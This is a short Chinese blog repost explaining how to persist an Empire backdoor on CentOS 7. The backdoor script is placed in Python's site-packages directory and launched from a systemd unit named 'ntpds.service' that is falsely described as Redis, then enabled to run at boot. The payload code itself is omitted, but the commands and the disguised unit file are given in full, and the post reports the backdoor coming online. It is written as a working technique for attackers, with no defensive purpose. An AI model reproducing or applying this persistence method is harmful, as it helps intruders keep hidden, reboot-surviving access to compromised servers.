首页 > 其他 > 详细

centos7下面利用服务启动empire后门的方法

时间:2020-01-08 11:44:57      阅读:138      评论:0      收藏:0      [点我收藏+]

//centos7下面利用服务启动empire后门的方法:

vi /usr/lib/python2.7/site-packages/pci.sh //放入empire后门
chmod 755 /usr/lib/python2.7/site-packages/pci.sh
cd /usr/lib/systemd/system
vi ntpds.service
chmod 755 ntpds.service
systemctl enable ntpds.service //设置开机启动
systemctl start ntpds.service
systemctl status ntpds.service

//pci.sh是empire后门代码:
#!/bin/sh
python后门代码略
//ntpds.service启动文件
[Unit]
Description=Redis
After=network.target remote-fs.target nss-lookup.target
 
[Service]
Type=forking
ExecStart=/usr/lib/python2.7/site-packages/pci.sh
ExecStop=
 
[Install]
WantedBy=multi-user.target

  

empire后门上线了:

技术分享图片

centos7下面利用服务启动empire后门的方法

原文:https://www.cnblogs.com/pt007/p/12165593.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!